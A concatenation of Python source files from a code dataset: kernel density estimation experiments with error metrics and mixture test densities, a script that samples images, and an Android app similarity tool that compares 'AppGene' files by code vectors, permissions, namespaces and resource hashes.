self.__name__ = name
self.n_training = n_training
self.n_test = n_test
self.dimensions = dimensions
self.actualsEstimator = actualsEstimator.fit()
self.train = DataFrame( self.actualsEstimator.sample(self.n_training) )
self.importance_test = DataFrame( self.actualsEstimator.sample(self.n_test) )
self.lows = self.train.min(axis=0)
self.highs = self.train.max(axis=0)
self.uniform_test = DataFrame( uniform(low=self.lows, high=self.highs, size=(self.n_test,self.dimensions)) )
self.importance_actuals = self.actualsEstimator.predict(self.importance_test)
self.uniform_actuals = self.actualsEstimator.predict(self.uniform_test)
self.test = self.importance_test
self.test_actuals = self.importance_actuals
#Build up a KDTRee for faster processing
self.kdt_ = KDTree(self.train, leaf_size=30, metric='euclidean')
self.dist_, self.nn_ = self.kdt_.query(self.test, k=int(1+self.n_test**0.5), return_distance=True)
self.dist_loo_, self.nn_loo_ = self.kdt_.query(self.train, k=int(1+self.n_training**0.5), return_distance=True)
def ISE(self, estimates, actuals):
r"""
.. math:: Q_N(e,a,p) = \frac{1}{N}\sum_{i=0}^N\frac{(e_i-a_i)^2}{p_i}
Integrated Squared Error with Importance Sampling.
Note: as implemented, the importance weights p_i are omitted and the
root of the mean squared error is returned.
"""
return mean(((estimates - actuals)**2.))**0.5
def IAE(self, estimates, actuals):
r"""
.. math:: Q_N(e,a,p) = \frac{1}{N}\sum_{i=0}^N\frac{|e_i-a_i|}{p_i}
Integrated Absolute Error with Importance Sampling.
Note: as implemented, the importance weights p_i are omitted and the
mean absolute error is returned.
"""
return mean(abs(estimates - actuals))
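    # Worked example with assumed values (a hypothetical helper, not part of
    # the experiments): estimates [0.2, 0.4] against actuals [0.1, 0.5] give
    # IAE = mean(0.1, 0.1) = 0.1 and ISE = sqrt(mean(0.01, 0.01)) = 0.1.
    @staticmethod
    def example_error_metrics():
        est, act = array([0.2, 0.4]), array([0.1, 0.5])
        assert abs(mean(abs(est - act)) - 0.1) < 1e-9  # IAE
        assert abs(mean((est - act) ** 2.) ** 0.5 - 0.1) < 1e-9  # ISE (RMSE form)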
def EmpericalEntropy(self, estimates):
return entropy(estimates, base=2)
def JensenShannon(self, estimates, actuals):
M = 0.5*(estimates+actuals)
return 0.5*(entropy(estimates,M, base=2) + entropy(actuals,M, base=2))
def KullbackLeiber(self, estimates, actuals):
return entropy(actuals, estimates, base=2)
def getResults(self, estimator, prekdt=False):
# uni_est = estimator.predict(self.uniform_test)
#Attach some pre calculated results to the estimator
if prekdt:
estimator.nn_ = self.nn_
estimator.dist_ = self.dist_
estimator.nn_loo_ = self.nn_loo_
estimator.dist_loo_ = self.dist_loo_
estimator.kdt_ = self.kdt_
est = estimator.predict(self.test)
actuals = self.test_actuals
estimator.nn_ = None
estimator.dist_ = None
estimator.nn_loo_ = None
estimator.dist_loo_ = None
estimator.kdt_ = None
return self.ISE(est, actuals), self.IAE(est, actuals), self.JensenShannon(est, actuals), self.KullbackLeiber(est, actuals), self.EmpericalEntropy(est)
class BlobExperiment(Experiment):
def __init__(self, n_training, n_test, means, covs, ratios=None, name='BlobExperiment'):
self.means = array(means)
self.covs = array(covs)
self.ratios = ratios
dimensions = self.means.shape[1]
actualsEstimator = data.TrueBlobDensity(self.means, self.covs, self.ratios).fit()
Experiment.__init__(self, n_training, n_test, dimensions, actualsEstimator, name=name)
def getSIGMA(self, std1,std2,rho):
return dot(array([[std1,std2]]).T,array([[std1,std2]])) * (rot90(diag([rho,rho]))+eye(2))
def getSIGMA_N(self, std,rho):
n=len(std)
return dot(array([std]).T,array([std])) * (rho*(1-eye(n))+eye(n))
class BallExperiment(Experiment):
def __init__(self, n_training, n_test, mean=[0,0], cov=0.5, inner_trials=10, name='ballExperiment'):
self.mean = array(mean)
self.cov = cov
self.inner_trials = inner_trials
dimensions = self.mean.shape[0]
actualsEstimator = data.TrueBallDensity(self.mean, self.cov, self.inner_trials).fit()
Experiment.__init__(self, n_training, n_test, dimensions, actualsEstimator, name=name)
class EllipsoidExperiment(Experiment):
def __init__(self, n_training, n_test, radii=[3,2,1], cov=0.05, name='ballExperiment'):
self.radii = array(radii)
self.cov = cov
dimensions = self.radii.shape[0]
actualsEstimator = data.TrueEllipsoidDensity(self.radii, self.cov).fit()
Experiment.__init__(self, n_training, n_test, dimensions, actualsEstimator, name=name)
class Experiment1(BlobExperiment):
r"""
Bimodal J
Density H, A [1, 2].
References
----------
[1] Wand, M.P. and Jones, M.C., 1993. Comparison of smoothing parameterizations in bivariate kernel density estimation. Journal of the American Statistical Association, 88(422), pp.520-528. http://www.jstor.org/stable/pdf/2290332.pdf
[2] Zhang, X., King, M.L. and Hyndman, R.J., 2006. A Bayesian approach to bandwidth selection for multivariate kernel density estimation. Computational Statistics & Data Analysis, 50(11), pp.3009-3031.
"""
def __init__(self, n_training=200, n_test=2000):
self.dimensions=2
self.modes=2
mu_1 = [ 2.0, 2.0]
mu_2 = [-1.5,-1.5]
sigma_1 = [[1.0,-0.9],[-0.9,1.0]]
sigma_2 = [[1.0, 0.3],[ 0.3,1.0]]
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2], [sigma_1,sigma_2],
None, "e1_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,2))
class Experiment2(BlobExperiment):
r"""
Skewed
Density C, #2, [1, 2, 3].
References
----------
[1] Wand, M.P. and Jones, M.C., 1993. Comparison of smoothing parameterizations in bivariate kernel density estimation. Journal of the American Statistical Association, 88(422), pp.520-528. http://www.jstor.org/stable/pdf/2290332.pdf
[2] Wu, T.J., Chen, C.F. and Chen, H.Y., 2007. A variable bandwidth selector in multivariate kernel density estimation. Statistics & probability letters, 77(4), pp.462-467. http://www.stat.ncku.edu.tw/faculty_private/tjwu/varbandnew.pdf
[3] Sain, S.R., 2002. Multivariate locally adaptive density estimation. Computational Statistics & Data Analysis, 39(2), pp.165-186. http://private.igf.edu.pl/~jnn/Literatura_tematu/Sain_2002.pdf
"""
def __init__(self, n_training=200, n_test=2000):
self.dimensions=2
self.modes=3
mu_1 = [0.0, 0.0]
mu_2 = [0.5, 0.5]
mu_3 = [13./12.,13/12.]
sigma_1 = diag([1, 1])
sigma_2 = diag([2./3.,2./3.])**2
sigma_3 = diag([5./9.,5./9.])**2
ratios = [0.2,0.2,0.6]
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2, mu_3], [sigma_1,sigma_2,sigma_3],
ratios, "e2_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,3))
class Experiment3(BlobExperiment):
r"""
Trimodal Gavel
Density I, D, F4, #7 [1,2,3,4].
References
----------
[1] Wand, M.P. and Jones, M.C., 1993. Comparison of smoothing parameterizations in bivariate kernel density estimation. Journal of the American Statistical Association, 88(422), pp.520-528. http://www.jstor.org/stable/pdf/2290332.pdf
[2] de Lima, M.S. and Atuncar, G.S., 2011. A Bayesian method to estimate the optimal bandwidth for multivariate kernel estimator. Journal of Nonparametric Statistics, 23(1), pp.137-148. http://www.tandfonline.com/doi/pdf/10.1080/10485252.2010.485200
[3] Zougab, N., Adjabi, S. and Kokonendji, C.C., 2014. Bayesian estimation of adaptive bandwidth matrices in multivariate kernel density estimation. Computational Statistics & Data Analysis, 75, pp.28-38. http://www.sciencedirect.com/science/article/pii/S0167947314000322
[4] Wu, T.J., Chen, C.F. and Chen, H.Y., 2007. A variable bandwidth selector in multivariate kernel density estimation. Statistics & probability letters, 77(4), pp.462-467. http://www.stat.ncku.edu.tw/faculty_private/tjwu/varbandnew.pdf
"""
def __init__(self, n_training=200, n_test=2000):
self.dimensions = 2
self.modes=3
mu_1 = [-6./5., 6./5.]
mu_2 = [6./5., -6./5.]
mu_3 = [0.,0.]
sigma_1 = self.getSIGMA(3./5.,3./5.,3./10.)
sigma_2 = self.getSIGMA(3./5.,3./5.,-3./5.)
sigma_3 = self.getSIGMA(1./4.,1./4.,1./5.)
ratios = [9./20.,9./20.,2./20.]
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2, mu_3], [sigma_1,sigma_2,sigma_3],
ratios, "e3_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,3))
class Experiment4(BlobExperiment):
r"""
Trimodal :math:`\lambda`
Density K, ,F3 [1,2,3].
References
----------
[1] Wand, M.P. and Jones, M.C., 1993. Comparison of smoothing parameterizations in bivariate kernel density estimation. Journal of the American Statistical Association, 88(422), pp.520-528. http://www.jstor.org/stable/pdf/2290332.pdf
[2] Sain, S.R., 2002. Multivariate locally adaptive density estimation. Computational Statistics & Data Analysis, 39(2), pp.165-186. http://private.igf.edu.pl/~jnn/Literatura_tematu/Sain_2002.pdf
[3] Zougab, N., Adjabi, S. and Kokonendji, C.C., 2014. Bayesian estimation of adaptive bandwidth matrices in multivariate kernel density estimation. Computational Statistics & Data Analysis, 75, pp.28-38. http://www.sciencedirect.com/science/article/pii/S0167947314000322
"""
def __init__(self, n_training=200, n_test=2000):
self.dimensions = 2
self.modes=3
mu_1 = [-1., 0.]
mu_2 = [ 1., 3**0.5*2./3.]
mu_3 = [ 1., -3**0.5*2./3.]
sigma_1 = self.getSIGMA(3./5.,7./10.,3./5.)
sigma_2 = self.getSIGMA(3./5.,7./10.,0. )
sigma_3 = self.getSIGMA(3./5.,7./10.,0.)
ratios = [3./7.,3./7.,1./7.]
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2, mu_3], [sigma_1,sigma_2,sigma_3],
ratios, "e4_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,3))
class Experiment5(BlobExperiment):
r"""
Bimodal T
Density F2, C [1,2].
References
----------
[1] Zougab, N., Adjabi, S. and Kokonendji, C.C., 2014. Bayesian estimation of adaptive bandwidth matrices in multivariate kernel density estimation. Computational Statistics & Data Analysis, 75, pp.28-38. http://www.sciencedirect.com/science/article/pii/S0167947314000322
[2] de Lima, M.S. and Atuncar, G.S., 2011. A Bayesian method to estimate the optimal bandwidth for multivariate kernel estimator. Journal of Nonparametric Statistics, 23(1), pp.137-148. http://www.tandfonline.com/doi/pdf/10.1080/10485252.2010.485200
"""
def __init__(self, n_training=200, n_test=2000):
self.dimensions=2
self.modes=2
mu_1 = [ 1., 1.]
mu_2 = [-1., -1.]
sigma_1 = self.getSIGMA(1.,1., 0.5)
sigma_2 = self.getSIGMA(1.,1.,-0.5)
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2], [sigma_1,sigma_2],
None, "e5_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,2))
class Experiment6(BlobExperiment):
r"""
Unimodal ND
Density F5, F7, _, _ [1,2].
References
----------
[1] Zougab, N., Adjabi, S. and Kokonendji, C.C., 2014. Bayesian estimation of adaptive bandwidth matrices in multivariate kernel density estimation. Computational Statistics & Data Analysis, 75, pp.28-38. http://www.sciencedirect.com/science/article/pii/S0167947314000322
[2] Duong, T. and Hazelton, M.L., 2005. Cross‐validation Bandwidth Matrices for Multivariate Kernel Density Estimation. Scandinavian Journal of Statistics, 32(3), pp.485-506. http://onlinelibrary.wiley.com/doi/10.1111/j.1467-9469.2005.00445.x/pdf
"""
def __init__(self, dimensions=3, n_training=300, n_test=2000):
self.dimensions=dimensions
self.modes=1
mu_1 = zeros(self.dimensions)
sigma_1 = self.getSIGMA_N(ones(self.dimensions), 0.9)
BlobExperiment.__init__(self, n_training, n_test, [mu_1], [sigma_1],
None, "e6_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,1))
class Experiment7(BlobExperiment):
r"""
Bimodal ND
Density F6, F7, G [1,2].
References
----------
[1] Zougab, N., Adjabi, S. and Kokonendji, C.C., 2014. Bayesian estimation of adaptive bandwidth matrices in multivariate kernel density estimation. Computational Statistics & Data Analysis, 75, pp.28-38. http://www.sciencedirect.com/science/article/pii/S0167947314000322
[2] de Lima, M.S. and Atuncar, G.S., 2011. A Bayesian method to estimate the optimal bandwidth for multivariate kernel estimator. Journal of Nonparametric Statistics, 23(1), pp.137-148. http://www.tandfonline.com/doi/pdf/10.1080/10485252.2010.485200
"""
def __init__(self, dimensions=3, n_training=300, n_test=2000):
self.dimensions=dimensions
self.modes=2
d = self.dimensions
mu_1 = ones(self.dimensions)*4. # [4., 4., 4.]
mu_2 = ones(self.dimensions)*1. # [1., 1., 1.]; a factor of 4. here would make both modes coincide, contradicting this comment
rho = 0.9
c = cartesian([arange(d), arange(d)] )
exp = abs(c[:,0]-c[:,1]).reshape((d,d))
sigma_1 = (ones((d,d))*rho)**exp
#sigma_1 = [[1., rho,rho**2],
# [rho, 1., rho ],
# [rho**2,rho,1. ]]
sigma_1 = array(sigma_1)/(1-rho**(d-1))
rho = 0.7
sigma_2 = (ones((d,d))*rho)**exp
#sigma_2 = [[1., rho,rho**2],
# [rho, 1., rho ],
# [rho**2,rho,1. ]]
sigma_2 = array(sigma_2)/(1-rho**(d-1))
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2], [sigma_1,sigma_2],
None, "e7_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,2))
class Experiment8(BlobExperiment):
r"""
Bimodal 4D
Density F8, H [1,2].
References
----------
[1] Zougab, N., Adjabi, S. and Kokonendji, C.C., 2014. Bayesian estimation of adaptive bandwidth matrices in multivariate kernel density estimation. Computational Statistics & Data Analysis, 75, pp.28-38. http://www.sciencedirect.com/science/article/pii/S0167947314000322
[2] de Lima, M.S. and Atuncar, G.S., 2011. A Bayesian method to estimate the optimal bandwidth for multivariate kernel estimator. Journal of Nonparametric Statistics, 23(1), pp.137-148. http://www.tandfonline.com/doi/pdf/10.1080/10485252.2010.485200
"""
def __init__(self, n_training=400, n_test=2000):
self.dimensions=4
self.modes=2
mu_1 = [1., 1., 1., 1.]
mu_2 = [-1., -1., -1., -1.]
sigma_1 = self.getSIGMA_N([1.,1.,1.,1.], 0.6)
sigma_2 = [[1.0,0.5,0.7,0.5],
[0.5,1.0,0.5,0.7],
[0.7,0.5,1.0,0.5],
[0.5,0.7,0.5,1.0]]
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2], [sigma_1,sigma_2],
None, "e8_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,2))
class ExperimentE(EllipsoidExperiment):
r"""
Infmodal ND
"""
def __init__(self, dimensions=2, n_training=200, n_test=2000):
self.dimensions = dimensions
self.modes=0
radii = arange(dimensions,0,-1)
cov=0.05
#sigma_inner = diag(ones(dimensions)*0.2)
EllipsoidExperiment.__init__(self, n_training, n_test, radii, cov,
"eE_n(%s)_d(%s)_mode(inf)"%(n_training,self.dimensions))
class ExperimentC(BallExperiment):
r"""
Infmodal ND
"""
def __init__(self, dimensions=2, n_training=200, n_test=2000):
self.dimensions = dimensions
mean = zeros(dimensions)
cov = diag(arange(0.9,0.1,-0.8/self.dimensions))
#sigma_inner = diag(ones(dimensions)*0.2)
BallExperiment.__init__(self, n_training, n_test, mean, cov,
10, "eC_n(%s)_d(%s)_mode(inf)"%(n_training,self.dimensions))
class ExperimentD(BlobExperiment):
r"""
Random M Modal ND
"""
def __init__(self, modes=1, dimensions=2, n_training=200, n_test=2000):
self.dimensions = dimensions
self.modes = modes
mu_s = []
sigma_s = []
for i in range(modes):
sigma_i = make_spd_matrix(self.dimensions)
#std = diag(sigma_i)**0.5
#rho = (sigma_i/outer(std,std))
#sigma_i = outer((std/std.max()/self.modes), (std/std.max()/self.modes)) * rho
sigma_s.append(sigma_i)
low = -0.5
high = 0.5
mu_s.append(uniform(low=low, high=high, size=(self.dimensions)) )
ratios = uniform(high=1./modes, size=(modes))
ratios[:] = 1./modes #ratios.sum()
BlobExperiment.__init__(self, n_training, n_test, mu_s, sigma_s,
ratios, "eD_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,self.modes))
| 48.768156 | 281 | 0.627986 | 2,492 | 17,459 | 4.241172 | 0.139246 | 0.037468 | 0.03321 | 0.038603 | 0.629672 | 0.599584 | 0.570631 | 0.547545 | 0.526161 | 0.517551 | 0 | 0.078784 | 0.223552 | 17,459 | 357 | 282 | 48.904762 | 0.700797 | 0.361991 | 0 | 0.174888 | 0 | 0 | 0.028665 | 0.023888 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103139 | false | 0 | 0.058296 | 0.013453 | 0.264574 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cc5c9273609531bbca19e97c35f0e5eef3aa812 | 675 | py | Python | offline_tools/processing/create_samples.py | kauevestena/snav | 73b93bc4e5c9d9fc51cbd3559a1d74209d2a7fc9 | [
"MIT"
] | 2 | 2019-05-13T20:46:01.000Z | 2021-02-10T14:06:37.000Z | offline_tools/processing/create_samples.py | kauevestena/snav | 73b93bc4e5c9d9fc51cbd3559a1d74209d2a7fc9 | [
"MIT"
] | null | null | null | offline_tools/processing/create_samples.py | kauevestena/snav | 73b93bc4e5c9d9fc51cbd3559a1d74209d2a7fc9 | [
"MIT"
] | null | null | null | import os
import glob
import random
from processing_functions import misc as msc
from shutil import copyfile
# define the number of samples you want
n_samples = 50
imgsPath = os.environ['HOME']+'/data/extracted_images/2019-07-11-16-21-46/ngr'
out_path = os.environ['HOME']+'/data/extracted_images/samples/'+msc.find_datetime_String(imgsPath)
# print(out_path)
msc.createDir(out_path)
imList = msc.orderedFileList(imgsPath)
n = len(imList)
print(n)
for i in range(n_samples):
    # note: randint draws with replacement, so the same image may be picked
    # twice; random.sample(imList, n_samples) would avoid duplicates
    imSample = imList[random.randint(0,n-1)]
filename = msc.filenameFromPath(imSample)
# print(filename)
copyfile(imSample,os.path.join(out_path,filename))
print('fim') | 19.285714 | 98 | 0.742222 | 100 | 675 | 4.9 | 0.56 | 0.057143 | 0.053061 | 0.069388 | 0.130612 | 0.130612 | 0 | 0 | 0 | 0 | 0 | 0.030875 | 0.136296 | 675 | 35 | 99 | 19.285714 | 0.809605 | 0.102222 | 0 | 0 | 0 | 0 | 0.145937 | 0.127695 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.294118 | 0 | 0.294118 | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cc5d0cf3bc75d730a617fb4405aa3d01d0ee2a9 | 16,626 | py | Python | AppcestryCore/compare.py | jason-chao/appcestry | c3858e51ac27466cb008722453a3cc9882b2e6a1 | [
"MIT"
] | 3 | 2019-04-04T02:49:40.000Z | 2021-08-31T03:19:47.000Z | AppcestryCore/compare.py | jason-chao/appcestry | c3858e51ac27466cb008722453a3cc9882b2e6a1 | [
"MIT"
] | null | null | null | AppcestryCore/compare.py | jason-chao/appcestry | c3858e51ac27466cb008722453a3cc9882b2e6a1 | [
"MIT"
] | 2 | 2019-04-05T15:06:54.000Z | 2019-08-04T12:21:55.000Z | #!/usr/bin/env python3
# This script compares AppGene files for similarity.
# Run this script in terminal / command line to see the usage of arguments.
import os
import argparse
from sklearn.feature_extraction.text import HashingVectorizer
import json
import re
from sklearn.metrics.pairwise import cosine_similarity
import numpy
import subprocess
import time
from pprint import pprint
import itertools
import gc
import random
import hashlib
hashFeatureNumber = 2 ** 16
nGramRange = (16, 16)
tmpDir = os.path.curdir
jsonStopCharRe = re.compile(",|:|,|{|}|\"")
def getAllFilesOfExtension(rootDir, extension):
"""Traverse a directory tree and find all the files with a specified extension
Args:
rootDir: The directory to traverse
extension: The extension
Returns:
A list of files
"""
fileList = []
for (dirPath, dirNames, fileNames) in os.walk(rootDir):
for baseName in fileNames:
if baseName.endswith(extension):
fileList.append((dirPath, baseName))
return fileList
def customTokenizer(input):
"""Tokenise transformed Smali instructions.
Args:
input: Lines of transformed instructions
Returns:
An array of transformed instructions
"""
return re.split("\n", input)
def getHashVector(content):
"""Get hash vector of transformed Smali instructions.
Args:
content: Lines of transformed instructions
Returns:
Hash vector
"""
hashVectorizer = HashingVectorizer(n_features=hashFeatureNumber, tokenizer=customTokenizer,
ngram_range=nGramRange)
return hashVectorizer.transform([content])
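# Usage sketch (assumed input, hypothetical helper): each line of the
# transformed instruction dump is one token, and runs of 16 consecutive lines
# (the (16, 16) n-gram range above) are hashed into a 2**16-dimensional
# sparse vector.
def _example_hash_vector():
    fake_smali = "\n".join("op{}".format(i) for i in range(32))
    vec = getHashVector(fake_smali)
    assert vec.shape == (1, hashFeatureNumber)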
def loadJSONFromFile(filename):
"""A generic function to read a JSON file.
Args:
filename: The full filename for the JSON file
Returns:
The object loaded from JSON
"""
jsonFile = open(filename, "r")
theObject = json.load(jsonFile)
jsonFile.close()
return theObject
def writeTextToBufferDir(baseFilename, text):
"""Write text to a file in the buffer directory.
Args:
baseFilename: Base filename of the target file
text: The text to be written to the file
Returns:
Full filename of the target file
"""
bufferFilename = os.path.join(tmpDir, baseFilename)
bufferFile = open(bufferFilename, "w")
bufferFile.write(text)
bufferFile.close()
return bufferFilename
def getTextSHA256(plaintext):
"""Get the SHA256 hash value of plaintext.
Args:
plaintext: The plaintext
Returns:
Hash value represented in Hex string
"""
textHash = hashlib.sha256(plaintext)
return "%s" % textHash.hexdigest()
def getHashInArray(arr):
"""Get the SHA256 hash values of elements in an array.
Args:
arr: The array
Returns:
An array of hash values (represented in Hex string)
"""
return [getTextSHA256(t.encode("utf-8")) for t in arr]
def diffContentPairAsFiles(file1Content, file2Content):
"""Use the operating system's wdiff utility to compare two files.
Args:
file1Content: Content of the first file
file2Content: Content of the second file
Returns:
Result object with properties: union, intersection and ratio
"""
diffResult = {"ratio": float(0), "intersection": float(0), "union": float(0)}
try:
tmpFilename1 = writeTextToBufferDir("_diff_tmp1_{}".format(time.time()), file1Content)
tmpFilename2 = writeTextToBufferDir("_diff_tmp2_{}".format(time.time()), file2Content)
diffOuput = subprocess.run("wdiff -s -1 -2 -3 {} {}".format(tmpFilename1, tmpFilename2), check=False,
stdout=subprocess.PIPE, shell=True).stdout.decode("utf-8")
# Parse the output of wdiff
diffOuput = diffOuput.replace(" word ", " words ").split("\n")
file1ResultSegments = diffOuput[0].split(" ")
file2ResultSegments = diffOuput[1].split(" ")
words = int(file1ResultSegments[file1ResultSegments.index("words") - 1])
if words > 0:
common = float(file1ResultSegments[file1ResultSegments.index("common") - 2])
file1Total = float(file1ResultSegments[file1ResultSegments.index("words") - 1])
file2Total = float(file2ResultSegments[file2ResultSegments.index("words") - 1])
diffResult["union"] = (file1Total + file2Total - common)
diffResult["intersection"] = common
diffResult["ratio"] = float(diffResult["intersection"]) / float(diffResult["union"])
os.remove(tmpFilename1)
os.remove(tmpFilename2)
except:
print("pair diff failed - {} {}".format(tmpFilename1, tmpFilename2))
gc.collect(2)
return diffResult
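# Minimal usage sketch (assumed strings; requires wdiff on the system):
# "a b c" and "b c d" share 2 words out of a 4-word union, so the expected
# ratio is 2/4 = 0.5.
def _example_wdiff_pair():
    return diffContentPairAsFiles("a b c", "b c d")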
def diffMarkupPairs(content1, content2):
"""Compare two markup (XML) files by their common attribute-value pairs and common values.
Args:
content1: Markup content of the first file
content2: Markup content of the second file
Returns:
Result object with properties: byAttributeValuePair and byValue (both of the same structure as the output from diffContentPairAsFiles)
"""
pairResult = {"byAttributeValuePair": None, "byValue": None}
content1 = jsonStopCharRe.sub("", content1)
content2 = jsonStopCharRe.sub("", content2)
if not ((not content1) and (not content2)):
pairResult["byAttributeValuePair"] = diffContentPairAsFiles(content1.replace(" ", "_").replace("\n", " "),
content2.replace(" ", "_").replace("\n", " "))
pairResult["byValue"] = diffContentPairAsFiles(content1.replace("\n", " "),
content2.replace("\n", " "))
return pairResult
def getJaccardSimilarity(arr1, arr2):
"""Get the Jaccard similarity of two arrays
Args:
arr1: The first array
arr2: The second array
Returns:
Result object with properties: union, intersection and ratio
"""
jaccardSimResult = {"ratio": float(0),
"intersection": float(len(numpy.intersect1d(arr1, arr2, assume_unique=True))),
"union": float(len(numpy.union1d(arr1, arr2)))}
if jaccardSimResult["union"] > float(0):
jaccardSimResult["ratio"] = jaccardSimResult["intersection"] / jaccardSimResult["union"]
return jaccardSimResult
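# Worked example (values chosen for illustration): [1, 2, 3] and [2, 3, 4]
# share 2 of 4 distinct elements, so the Jaccard ratio is 2/4 = 0.5.
def _example_jaccard():
    demo = getJaccardSimilarity(numpy.array([1, 2, 3]), numpy.array([2, 3, 4]))
    assert abs(demo["ratio"] - 0.5) < 1e-9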
def getEmptyJaccardResult():
"""Get as empty Jaccard similarity result object.
Returns:
Result object with properties: union, intersection and ratio (all values are 0)
"""
return {"ratio": 0, "intersection": 0, "union": 0}
def compareGenes(gene1, gene2):
"""Compare a pair of AppGene objects
Args:
gene1: The first AppGene object
gene2: The second AppGene object
Returns:
Result object with properties:
smali:
cosineSimilarity: The cosine similarity of the hash vectors of AppGene pairs
byLine: The union, intersection and ratio (Jaccard Similarity) of transformed Smali instructions by line
1-gram: The union, intersection and ratio (Jaccard Similarity) of transformed Smali instructions by opcode and argument
namespace: The union, intersection and ratio (Jaccard Similarity) of namespaces (code package names in full)
markup:
names: The union, intersection and ratio (Jaccard Similarity) of attribute names in markup (XML) files
values: The union, intersection and ratio (Jaccard Similarity) of attribute values in markup (XML) files
media:
exactDuplicates: The union, intersection and ratio (Jaccard Similarity) of SHA256 values of resource files (exact matches)
nearDuplicates: The union, intersection and ratio (Jaccard Similarity) of pHash (perceptual hash) values of image files (near matches)
permission:
android: The union, intersection and ratio (Jaccard Similarity) of Android permissions
non-android: The union, intersection and ratio (Jaccard Similarity) of custom permissions
"""
result = {"smali": {}, "namespace": {}, "markup": {}, "media": {}, "permission": {}}
try:
print("Comparing vectorised code ...")
result["smali"]["cosineSimilarity"] = cosine_similarity(gene1["features"]["smaliVector"],
gene2["features"]["smaliVector"]).item(0)
except:
print("Failed to compare vectorised code")
result["smali"]["cosineSimilarity"] = 0
try:
print("Comparing disassembled code ...")
result["smali"]["byLine"] = diffContentPairAsFiles(gene1["smali"].replace(" ", "_"),
gene2["smali"].replace(" ", "_"))
result["smali"]["1-gram"] = diffContentPairAsFiles(gene1["smali"].replace("\n", " "),
gene2["smali"].replace("\n", " "))
except:
print("Failed to compare disassembled code")
result["smali"]["byLine"] = getEmptyJaccardResult()
result["smali"]["1-gram"] = getEmptyJaccardResult()
try:
print("Comparing permissions ...")
result["permission"] = {
"android": getJaccardSimilarity([pf for pf in gene1["permission-feature"] if pf.startswith("android.")],
[pf for pf in gene2["permission-feature"] if pf.startswith("android.")]),
"non-android": getJaccardSimilarity(
[pf for pf in gene1["permission-feature"] if not pf.startswith("android.")],
[pf for pf in gene2["permission-feature"] if not pf.startswith("android.")])}
except:
print("Failed to compare permissions")
result["permission"]["android"] = getEmptyJaccardResult()
result["permission"]["non-android"] = getEmptyJaccardResult()
try:
print("Comparing namespaces ...")
result["namespace"] = getJaccardSimilarity(gene1["namespace"], gene2["namespace"])
except:
print("Failed to compare namespaces")
result["namespace"] = getEmptyJaccardResult()
try:
print("Comparing media files ...")
result["media"]["exactDuplicates"] = getJaccardSimilarity(gene1["features"]["media_sha256"],
gene2["features"]["media_sha256"])
result["media"]["nearDuplicates"] = getJaccardSimilarity(gene1["features"]["media_phash"],
gene2["features"]["media_phash"])
except:
print("Failed to media files")
result["media"]["exactDuplicates"] = getEmptyJaccardResult()
result["media"]["nearDuplicates"] = getEmptyJaccardResult()
try:
print("Comparing markup files ...")
result["markup"]["names"] = getJaccardSimilarity(getHashInArray(gene1["markup"]["names"]),
getHashInArray(gene2["markup"]["names"]))
result["markup"]["values"] = getJaccardSimilarity(getHashInArray(gene1["markup"]["values"]),
getHashInArray(gene2["markup"]["values"]))
except:
print("Failed to markup files")
result["markup"]["names"] = getEmptyJaccardResult()
result["markup"]["values"] = getEmptyJaccardResult()
return result
def computeFeatures(geneObject):
"""Vectorise and Smali code and hash the resource files.
Args:
geneObject: AppGene object
Returns:
The AppGene object with a new property "features" with properties:
smaliVector: The hash vector of transformed Smali code
media_phash: List of pHash (perceptual hash) values of image files
media_sha256: List of SHA256 values of all other resource files
"""
geneObject["features"] = {}
geneObject["features"]["smaliVector"] = getHashVector(geneObject["smali"])
geneObject["features"]["media_phash"] = list(geneObject["media"]["phash"].keys())
geneObject["features"]["media_sha256"] = list(geneObject["media"]["sha256"].keys())
return geneObject
def dumpObjectAsJson(obj, filename):
"""Write/dump an object to a JSON file.
Args:
obj: The object to be dumped
filename: The full filename of the target file
Returns:
None
"""
outputFileHandler = open(filename, "w")
json.dump(obj, outputFileHandler, indent=4, ensure_ascii=False, sort_keys=True)
outputFileHandler.close()
def comparePair(geneFilename1, geneFilename2):
"""Load two AppGenes from JSON files and pass them to the compareGenes function.
Args:
geneFilename1: Full filename of the first AppGene file
geneFilename2: Full filename of the second AppGene file
Returns:
The same result object as the compareGenes function, supplemented by a new property "pair": an array containing the ids and version codes of the two AppGenes (see the code below for the structure).
"""
result = None
print("About to process {} and {}".format(geneFilename1, geneFilename2))
try:
gene1 = loadJSONFromFile(geneFilename1)
gene1 = computeFeatures(gene1)
gene2 = loadJSONFromFile(geneFilename2)
gene2 = computeFeatures(gene2)
print("Comparing {} to {}".format(gene1["appID"], gene2["appID"]))
result = compareGenes(gene1, gene2)
result["pair"] = []
result["pair"].extend([{"id": gene1["appID"],
"version": gene1["appVersion"]},
{"id": gene2["appID"],
"version": gene2["appVersion"]}])
except:
print("Comparison failed")
gc.collect()
return result
def compareAppGenesInDir(geneFileList, shuffle):
